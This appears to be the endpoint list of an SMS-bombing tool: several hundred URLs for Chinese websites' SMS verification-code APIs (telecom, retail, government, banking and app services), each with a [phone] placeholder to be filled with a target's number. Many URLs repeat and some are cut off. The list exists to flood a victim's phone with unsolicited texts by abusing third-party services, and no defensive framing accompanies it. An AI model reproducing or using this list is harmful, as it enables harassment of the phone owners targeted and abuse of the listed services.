"https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]/mineTker", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", - "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]&type=1", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]&v=5.5.32.83027", - "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", - "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", - "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", - "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", - "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", - "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", - "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", - "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", - "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", - "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", - "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://m.zhaopin.com/api/capi?capiUrl=passport/getSmsCodeSecurity&mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", - "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", - "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.gangaimall.com:80/mbb-web/api/account/code?mobile=[phone]&type=0", - "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]&type=register&_=1582428078447", - "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", - "http://api.moonreader.cn/mreader/common/sendMobile.do?mobile=[phone]", - "http://app.zhigoukeji.com/index.php?s=/api/mobile_verify_code_get_request/index2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", - "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", - "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.287588&imei=F3F6BCC9-", - "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", - "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", - "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", - "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.cshixi.com/api/sendCode?username=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", - "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", - "http://ccyagu.gswanzhong.com:80/Apicloud/User/sendCaptcha?Mobile=[phone]", - "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://dxhz.xqapi.live/api.php?id=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.ydhz.xyz/index.php?hm=[phone]", - "https://couple-api.jizhangapp.com/login/captcha/[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", - "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", - "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", - "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=%2B86&phone_number=[phone]&type=activation&version=1", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://beacons.gcp.gvt2.com/domainreliability/upload", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", - "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", - "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", - "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", - "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", - "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.metromall.cn/user/MobileCode.aspx?randnum=&Phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", - "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - 